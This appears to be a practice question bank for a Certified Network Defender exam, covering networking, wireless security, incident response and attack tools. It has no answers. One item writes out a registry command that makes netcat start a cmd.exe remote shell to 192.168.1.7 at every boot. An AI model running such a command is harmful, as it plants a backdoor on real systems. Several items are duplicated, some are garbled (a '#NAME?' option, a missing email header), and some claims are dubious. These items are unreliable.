Certified Network Defender TEST B

Which of the following are used as a cost estimating technique during the project planning stage? Each correct answer represents a complete solution. (Choose three.). Function point analysis. Program Evaluation Review Technique (PERT). Expert judgment. Delphi technique.

Which of the following provide an "always on" Internet access service when connecting to an ISP? Each correct answer represents a complete solution. (Choose two.). Digital modem. Cable modem. Analog modem. DSL.

Which of the following types of coaxial cable is used for cable TV and cable modems?. RG-62. RG-59. RG-58. RG-8.

Which of the following fields in the IPv6 header is decremented by 1 for each router that forwards the packet?. Flow label. Next header. Traffic class. Hop limit.

Which of the following is a type of computer security that deals with protection against spurious signals emitted by electrical equipment in the system?. Communication Security. Physical security. Emanation Security. Hardware security.

Which of the following network devices operate at the network layer of the OSI model? Each correct answer represents a complete solution. Choose all that apply. Router. Bridge. Repeater. Gateway.

Fill in the blank with the appropriate term. The ______________ layer establishes, manages, and terminates the connections between the local and remote application.(transport)(network)(session).

Fill in the blank with the appropriate term. ______________management is an area of systems management that involves acquiring, testing, and installing multiple patches (code changes) to an administered computer system.(update)(scan)(patch).

Adam, a malicious hacker, has just succeeded in stealing a secure cookie via a XSS attack. He is able to replay the cookie even while the session is valid on the server. Which of the following is the most likely reason of this cause?. No encryption is applied. Two way encryption is applied. Encryption is performed at the network layer (layer 1 encryption). Encryption is performed at the application layer (single encryption key).

Fill in the blank with the appropriate word. A ______________ policy is defined as the document that describes the scope of an organization's security requirements.(document)(network)(security).

Which of the following is a Unix and Windows tool capable of intercepting traffic on a network segment and capturing username and password?. AirSnort. Ettercap. BackTrack. Aircrack.

Which of the following standards is a proposed enhancement to the 802.11a and 802.11b wireless LAN (WLAN) specifications that offers quality of service (QoS) features, including the prioritization of data, voice, and video transmissions?. 802.15. 802.11n. 802.11e. 802.11h.

Which of the following key features is used by TCP in order to regulate the amount of data sent by a host to another host on the network?. Sequence number. TCP timestamp. Congestion control. Flow control.

Which of the following representatives in the incident response process are included in the incident response team? Each correct answer represents a complete solution. Choose all that apply. Information security representative. Legal representative. Technical representative. Lead investigator. Human resources. Sales representative.

Which of the following is a device that provides local communication between the datalogger and a computer?. Controllerless modem. Optical modem. Acoustic modem. Short haul modem.

Which of the following plans is documented and organized for emergency response, backup operations, and recovery maintained by an activity as part of its security program that will ensure the availability of critical resources and facilitates the continuity of operations in an emergency situation?. Contingency Plan. Disaster Recovery Plan. Business Continuity Plan. Continuity Of Operations Plan.

Fill in the blank with the appropriate term. ______________ is the use of sensitive words in e-mails to jam the authorities that listen in on them by providing a form of a red herring and an intentional annoyance.(email phishing)(email)(email jamming).

Which of the following is a standard-based protocol that provides the highest level of VPN security?. L2TP. IP. PPP. IPSec.

You run the following command on the remote Windows server 2003 computer: c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe" What task do you want to perform by running this command? Each correct answer represents a complete solution. Choose all that apply. You want to perform banner grabbing. You want to put Netcat in the stealth mode. You want to add the Netcat command to the Windows registry. You want to set the Netcat to execute command any time.

Which of the following UTP cables uses four pairs of twisted cable and provides transmission speeds of up to 16 Mbps?. Category 5e. Category 3. Category 5. Category 6.

Which of the following protocols is used for inter-domain multicast routing and natively supports "source-specific multicast" (SSM)?. BGMP. DVMRP. OSPF. EIGRP.

You have just set up a wireless network for customers at a coffee shop. Which of the following are good security measures to implement? Each correct answer represents a complete solution. (Choose two.). Using WPA encryption. Not broadcasting SSID. Using WEP encryption. MAC filtering the router.

Which of the following are the various methods that a device can use for logging information on a Cisco router? Each correct answer represents a complete solution. Choose all that apply. Buffered logging. Syslog logging. NTP logging. Terminal logging. Console logging. SNMP logging.

Which of the following is a software tool used in passive attacks for capturing network traffic?. Sniffer. Intrusion detection system. Intrusion prevention system. Warchalking.

John works as an Incident manager for TechWorld Inc. His task is to set up a wireless network for his organization. For this, he needs to decide the appropriate devices and policies required to set up the network. Which of the following phases of the incident handling process will help him accomplish the task?. Containment. Recovery. Preparation. Eradication.

Fill in the blank with the appropriate term. A ______________ is a physical or logical subnetwork that adds an additional layer of security to an organization's Local Area Network. (VPN)(honeypot)(demilitarized zone).

Fill in the blank with the appropriate term. ______________ is a codename referring to investigations and studies of compromising emission (CE).(tempest)(test)(ping).

Which of the following router configuration modes changes terminal settings on a temporary basis, performs basic tests, and lists system information?. Global Config. Interface Config. Privileged EXEC. User EXEC.

Which of the following is the primary international body for fostering cooperative standards for telecommunications equipment and systems?. ICANN. IEEE. NIST. CCITT.

Which of the following is an exterior gateway protocol that communicates using a Transmission Control Protocol (TCP) and sends the updated router table information?. IGMP. IRDP. OSPF. BGP.

Which of the following statements are true about a wireless network? Each correct answer represents a complete solution. Choose all that apply. Data can be shared easily between wireless devices. It provides mobility to users to access a network. Data can be transmitted in different ways by using Cellular Networks, Mobitex, DataTAC, etc. It is easy to connect.

Which of the following is a device that receives a digital signal on an electromagnetic or optical transmission medium and regenerates the signal along the next leg of the medium?. Gateway. Repeater. Network adapter. Transceiver.

Mark works as a Network Administrator for Infonet Inc. The company has a Windows 2000 Active Directory domain-based network. The domain contains one hundred Windows XP Professional client computers. Mark is deploying an 802.11 wireless LAN on the network. The wireless LAN will use Wired Equivalent Privacy (WEP) for all the connections. According to the company's security policy, the client computers must be able to automatically connect to the wireless LAN. However, the unauthorized computers must not be allowed to connect to the wireless LAN and view the wireless network. Mark wants to configure all the wireless access points and client computers to act in accordance with the company's security policy. What will he do to accomplish this? Each correct answer represents a part of the solution. (Choose three.). Install a firewall software on each wireless access point. Configure the authentication type for the wireless LAN to Shared Key. Disable SSID Broadcast and enable MAC address filtering on all wireless access points. Broadcast SSID to connect to the access point (AP). Configure the authentication type for the wireless LAN to Open system. On each client computer, add the SSID for the wireless LAN as the preferred network.

Which of the following steps of the OPSEC process examines each aspect of the planned operation to identify OPSEC indicators that could reveal critical information and then compare those indicators with the adversary's intelligence collection capabilities identified in the previous action?. Analysis of Threats. Analysis of Vulnerabilities. Assessment of Risk. Identification of Critical Information. Application of Appropriate OPSEC Measures.

Which of the following is a communication protocol that multicasts messages and information among all member devices in an IP multicast group?. ICMP. IGMP. BGP. EGP.

In which of the following attacks do computers act as zombies and work together to send out bogus messages, thereby increasing the amount of phony traffic?. Smurf attack. Buffer-overflow attack. DDoS attack. Bonk attack.

Attacks are classified into which of the following? Each correct answer represents a complete solution. Choose all that apply. Active attack. Session hijacking. Passive attack. Replay attack.

Which of the following is a technique for gathering information about a remote network protected by a firewall?. Firewalking. Warchalking. Wardriving. Wardialing.

Which of the following is an Internet application protocol used for transporting Usenet news articles between news servers and for reading and posting articles by end-user client applications?. NNTP. BOOTP. DCAP. NTP.

Which of the following attacks is a class of brute force attacks that depends on the higher likelihood of collisions found between random attack attempts and a fixed degree of permutations?. Phishing attack. Replay attack. Birthday attack. Dictionary attack.

Which of the following is a digital telephone/telecommunication network that carries voice, data, and video over an existing telephone network infrastructure?. PPP. Frame relay. ISDN. X.25.

Fill in the blank with the appropriate term. ______________ is a prime example of a high-interaction honeypot.(honeyLAN)(honeypot)(honeynet).

Fill in the blank with the appropriate term. ______________ is an enumeration technique used to glean information about computer systems on a network and the services running its open ports.(scan)(banner grabbing)(nslookup).

Which of the following steps are required in an idle scan of a closed port? Each correct answer represents a part of the solution. Choose all that apply. The attacker sends a SYN/ACK to the zombie. The zombie's IP ID increases by only 1. In response to the SYN, the target sends a RST. The zombie ignores the unsolicited RST, and the IP ID remains unchanged. The zombie's IP ID increases by 2.

Which of the following is a mechanism that helps in ensuring that only the intended and authorized recipients are able to read data?. Integrity. Data availability. Confidentiality. Authentication.

Which of the following help in estimating and totaling up the equivalent money value of the benefits and costs to the community of projects for establishing whether they are worthwhile? Each correct answer represents a complete solution. Choose all that apply. Business Continuity Planning. Benefit-Cost Analysis. Disaster recovery. Cost-benefit analysis.

Which of the following steps will NOT make a server fault tolerant? Each correct answer represents a complete solution. (Choose two.). Adding a second power supply unit. Performing regular backup of the server. Adding one more same sized disk as mirror on the server. Implementing cluster servers' facility. Encrypting confidential data stored on the server.

This is a Windows-based tool that is used for the detection of wireless LANs using the IEEE 802.11a, 802.11b, and 802.11g standards. The main features of these tools are as follows: It displays the signal strength of a wireless network, MAC address, SSID, channel details, etc. It is commonly used for the following purposes: a.War driving b.Detecting unauthorized access points c.Detecting causes of interference on a WLAN d.WEP ICV error tracking e.Making Graphs and Alarms on 802.11 Data, including Signal Strength This tool is known as __________. Kismet. Absinthe. THC-Scan. NetStumbler.

Which of the following are the common security problems involved in communications and email? Each correct answer represents a complete solution. Choose all that apply. False message. Message digest. Message replay. Message repudiation. Message modification. Eavesdropping. Identity theft.

Which of the following are the six different phases of the Incident handling process? Each correct answer represents a complete solution. Choose all that apply. Containment. Identification. Post mortem review. Preparation. Lessons learned. Recovery. Eradication.

Which of the following steps of the OPSEC process examines each aspect of the planned operation to identify OPSEC indicators that could reveal critical information and then compare those indicators with the adversary's intelligence collection capabilities identified in the previous action?. Analysis of Threats. Application of Appropriate OPSEC Measures. Identification of Critical Information. Analysis of Vulnerabilities. Assessment of Risk.

Which of the following statements are true about an IPv6 network? Each correct answer represents a complete solution. Choose all that apply. For interoperability, IPv4 addresses use the last 32 bits of IPv6 addresses. It increases the number of available IP addresses. It uses longer subnet masks than those used in IPv4. It provides improved authentication and security. It uses 128-bit addresses.

Which of the following transmission modes of communication is one-way?. Half duplex. full-duplex mode. #NAME?. root mode.

Which of the following is designed to detect unwanted changes by observing the flame of the environment associated with combustion?. Fire extinguishing system. None. Gaseous fire-extinguishing systems. sprinkler. Smoke alarm system.

Which of the following features is used to generate spam on the Internet by spammers and worms?. AutoComplete. SMTP relay. Server Message Block (SMB) signing. AutoFill.

Which of the following tools is described below? It is a set of tools that are used for sniffing passwords, e-mail, and HTTP traffic. Some of its tools include arpredirect, macof, tcpkill, tcpnice, filesnarf, and mailsnarf. It is highly effective for sniffing both switched and shared networks. It uses the arpredirect and macof tools for switching across switched networks. It can also be used to capture authentication information for FTP, telnet, SMTP, HTTP, POP, NNTP, IMAP, etc. Dsniff. Cain. Libnids. LIDS.

Which of the following IP class addresses are not allotted to hosts? Each correct answer represents a complete solution. Choose two. Class C. Class D. Class A. Class B. Class E.

A war dialer is a tool that is used to scan thousands of telephone numbers to detect vulnerable modems. It provides an attacker unauthorized access to a computer. Which of the following tools can an attacker use to perform war dialing? Each correct answer represents a complete solution. Choose two. ToneLoc. Wingate. THC-Scan. NetStumbler.

Which of the following protocols is used to share information between routers to transport IP Multicast packets among networks?. RSVP. DVMRP. RPC. LWAPP.

Which of the following is a network interconnectivity device that translates different communication protocols and is used to connect dissimilar network technologies?. Gateway. Router. Bridge. Switch.

Which of the following is a tool that runs on the Windows OS and analyzes iptables log messages to detect port scans and other suspicious traffic?. PSAD. Hping. NetRanger. Nmap.

Fill in the blank with the appropriate term. A ______________ is a physical or logical subnetwork that contains and exposes external services of an organization to a larger network.(VPN)(LAN)(demilitarized zone).

Which of the following statements are true about security risks? Each correct answer represents a complete solution. (Choose three.). They are considered an indicator of threats coupled with vulnerability. They can be removed completely by taking proper actions. They can be analyzed and measured by the risk analysis process. They can be mitigated by reviewing and taking responsible actions based on possible risks.

Which of the following statements are TRUE about Demilitarized zone (DMZ)? Each correct answer represents a complete solution. Choose three. The purpose of a DMZ is to add an additional layer of security to the Local Area Network of an organization. Hosts in the DMZ have full connectivity to specific hosts in the internal network. Demilitarized zone is a physical or logical sub-network that contains and exposes external services of an organization to a larger un-trusted network. In a DMZ configuration, most computers on the LAN run behind a firewall connected to a public network like the Internet.

Which of the following is a management process that provides a framework for promoting quick recovery and the capability for an effective response to protect the interests of its brand, reputation, and stakeholders?. Log analysis. Patch management. Incident handling. Business Continuity Management.

Jason works as a System Administrator for www.company.com Inc. The company has a Windows-based network. Sam, an employee of the company, accidentally changes some of the applications and system settings. He complains to Jason that his system is not working properly. To troubleshoot the problem, Jason diagnoses the internals of his computer and observes that some changes have been made in Sam's computer registry. To rectify the issue, Jason has to restore the registry. Which of the following utilities can Jason use to accomplish the task? Each correct answer represents a complete solution. Choose three. Resplendent registrar. Regedit.exe. Reg.exe. EventCombMT.

Which of the following are the valid steps for securing routers? Each correct answer represents a complete solution. Choose three. Use a password that is easy to remember for a router's administrative console. Use a complex password for a router's administrative console. Configure access list entries to prevent unauthorized connections and traffic routing. Keep routers updated with the latest security patches.

In which of the following attacks does an attacker successfully insert an intermediary software or program between two communicating hosts?. Session hijacking. Denial-of-Service. Man-in-the-middle. Buffer overflow.

Which of the following is a standard-based protocol that provides the highest level of VPN security?. IPSec. IP. PPP. L2TP.

Which of the following is a computer networking protocol used by hosts to retrieve IP address assignments and other configuration information?. SNMP. ARP. DHCP. Telnet.

Adam, a malicious hacker, has just succeeded in stealing a secure cookie via a XSS attack. He is able to replay the cookie even while the session is valid on the server. Which of the following is the most likely reason of this cause?. Encryption is performed at the network layer (layer 1 encryption). Encryption is performed at the application layer (single encryption key). No encryption is applied. Two way encryption is applied.

Which of the following is a maintenance protocol that permits routers and host computers to swap basic control information when data is sent from one computer to another?. IGMP. ICMP. SNMP. BGP.

Which of the following procedures is intended to provide security personnel to identify, mitigate, and recover from malware events, such as unauthorized access to systems or data, denial-of-service or unauthorized changes to the system hardware, software, or information?. None. disaster survival plan. Cyber Incident Response Plan. A resident of the emergency plan. Crisis communications guidelines.

John visits an online shop that stores the IDs and prices of the items to buy in a cookie. After selecting the items that he wants to buy, the attacker changes the price of the item to 1. Original cookie values: ItemID1=2 - ItemPrice1=900 - ItemID2=1 - ItemPrice2=200 - Modified cookie values: ItemID1=2 - ItemPrice1=1 - ItemID2=1 - ItemPrice2=1 - Now, he clicks the Buy button, and the prices are sent to the server that calculates the total price. Which of the following hacking techniques is John performing?. Computer-based social engineering. Man-in-the-middle attack. Cookie poisoning. Cross site scripting.

Which of the following policies is used to add additional information about the overall security posture and serves to protect employees and organizations from inefficiency or ambiguity?. User policy. Group policy. Issue-Specific Security Policy. IT policy.

Which of the following UTP cables uses four pairs of twisted cable and provides transmission speeds of up to 16 Mbps?. Category 5e. Category 5. Category 3. Category 6.

John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He is using a tool to crack the wireless encryption keys. The description of the tool is as follows: `It is a Linux-based WLAN WEP cracking tool that recovers encryption keys. It operates by passively monitoring transmissions. It uses Ciphertext Only Attack and captures approximately 5 to 10 million packets to decrypt the WEP keys.` Which of the following tools is John using to crack the wireless encryption keys?. Cain. PsPasswd. Kismet. AirSnort.

Which of the following statements are true about volatile memory? Each correct answer represents a complete solution. Choose two. The content is stored permanently and even the power supply is switched off. A volatile storage device is faster in reading and writing data. Read only memory (ROM) is an example of volatile memory. It is computer memory that requires power to maintain the stored information.

You are a professional Computer Hacking forensic investigator. You have been called to collect evidences of buffer overflow and cookie snooping attacks. Which of the following logs will you review to accomplish the task? Each correct answer represents a complete solution. Choose three. Program logs. Web server logs. Event logs. System logs.

John works as an Ethical Hacker for www.company.com Inc. He wants to find out the ports that are open in www.company.com's server using a port scanner. However, he does not want to establish a full TCP connection. Which of the following scanning techniques will he use to accomplish this task?. TCP SYN. Xmas tree. TCP SYN/ACK. TCP FIN.

Fill in the blank with the appropriate term. ______________ is a prime example of a high-interaction honeypot.(Honeynet)(Honeypot)(filesharing).

Which of the following tools is an open source protocol analyzer that can capture traffic in real time?. NetResident. Wireshark. Bridle. NetWitness. None.

Which of the following tools are NOT used for logging network activities in the Linux operating system? Each correct answer represents a complete solution. Choose two. PsLoggedOn. PsGetSid. Timbersee. Swatch.

Fill in the blank with the appropriate term. The______________ model is a description framework for computer network protocols and is sometimes called the Internet Model or the DoD Model.(TCP/IP)(NAT)(UDP).

Which of the following is a software tool used in passive attacks for capturing network traffic?. Intrusion prevention system. Intrusion detection system. Warchalking. Sniffer.

Which of the following types of coaxial cable is used for cable TV and cable modems?. RG-8. RG-62. RG-59. RG-58.

In an Ethernet peer-to-peer network, which of the following cables is used to connect two computers, using RJ-45 connectors and Category-5 UTP cable?. Serial. Loopback. Crossover. Parallel.

You work as a Network Security Analyzer. You got a suspicious email while working on a forensic project. Now, you want to know the IP address of the sender so that you can analyze various information such as the actual location, domain information, operating system being used, contact information, etc. of the email sender with the help of various tools and resources. You also want to check whether this email is fake or real. You know that analysis of email headers is a good starting point in such cases. The email header of the suspicious email is given below: 209.191.91.180. 141.1.1.1. 172.16.10.90. 216.168.54.25.

Which of the following is the practice of sending unwanted e-mail messages, frequently with commercial content, in large quantities to an indiscriminate set of recipients? Each correct answer represents a complete solution. Choose two. Email spoofing. Junk mail. E-mail spam. Email jamming.

Which of the following is a worldwide organization that aims to establish, refine, and promote Internet security standards?. ANSI. WASC. IEEE. ITU.

Which of the following statements are TRUE about Demilitarized zone (DMZ)? Each correct answer represents a complete solution. Choose three. In a DMZ configuration, most computers on the LAN run behind a firewall connected to a public network like the Internet. Demilitarized zone is a physical or logical sub-network that contains and exposes external services of an organization to a larger un-trusted network. The purpose of a DMZ is to add an additional layer of security to the Local Area Network of an organization. Hosts in the DMZ have full connectivity to specific hosts in the internal network.

Which of the following network scanning tools is a TCP/UDP port scanner that works as a ping sweeper and hostname resolver?. Hping. SuperScan. Netstat. Nmap.

Which of the following is a network layer protocol used to obtain an IP address for a given hardware (MAC) address?. IP. PIM. RARP. ARP.

Fill in the blank with the appropriate term. A ______________ is a term in computer terminology used for a trap that is set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems.(Honeynet)(DMZ)(Honeypot).

Which of the following is a network maintenance protocol of the TCP/IP protocol suite that is responsible for the resolution of IP addresses to media access control (MAC) addresses of a network interface card (NIC)?. DHCP. ARP. PIM. RARP.

What is the range for registered ports?. 1024 through 49151. 0 through 1023. Above 65535. 49152 through 65535.

How many layers are present in the TCP/IP model?. 10. 5. 4. 7.

In which of the following transmission modes is communication uni-directional?. Root mode. Full-duplex mode. Half-duplex mode. Simplex mode.

CSMA/CD is specified in which of the following IEEE standards?. 802.3. 802.2. 802.1. 802.15.

What is the response of an Xmas scan if a port is either open or filtered?. RST. No response. FIN. PUSH.